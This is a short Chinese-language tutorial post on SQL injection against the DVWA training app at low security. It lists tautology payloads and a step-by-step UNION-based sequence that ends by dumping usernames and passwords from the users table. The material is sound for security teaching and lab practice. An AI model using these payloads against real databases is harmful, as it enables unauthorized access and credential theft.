DVWA sql注入low级别

2021-01-27 15:29:04 浏览数 (1)

DVWA sql注入low级别

sql注入分类

  • 数字型注入

SELECT first_name, last_name FROM users WHERE user_id = $id

  • 字符型注入

SELECT first_name, last_name FROM users WHERE user_id = '$id'

一般可以通过直接输入单引号来判断是否存在注入点

通过输入3和1 2判断注入为字符型注入,若为数字型注入,则3和1 2输出一样

字符型注入

字符型注入最关键的是如何闭合SQL语句以及注释多余的代码

SELECT first_name, last_name FROM users WHERE user_id = '$id'

  • ' or 1=1 or ' SELECT first_name, last_name FROM users WHERE user_id = ' ' or 1=1 or ' ' False or True or False
  • 1' or '1' ='1 SELECT first_name, last_name FROM users WHERE user_id = '1' or '1' ='1' True or True
  • 'or 1=1 # SELECT first_name, last_name FROM users WHERE user_id = ''or 1=1 #'

# 为注释

False or True

  • 'or 1=1 -- SELECT first_name, last_name FROM users WHERE user_id = ''or 1=1 -- ' -- (有空格)也是注释 False or True

判断数据库字段数

  1. 1' order by 2 #
  1. 1' order by 3 #

判断数据库字段数为2

确定回显位置(SQL语句查询后显示的位置)

1' union select 1,2 #

查询当前用户名和数据库

1' union select user(),database() #

获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

获取字段中的数据

1' union select user,password from users#

0 人点赞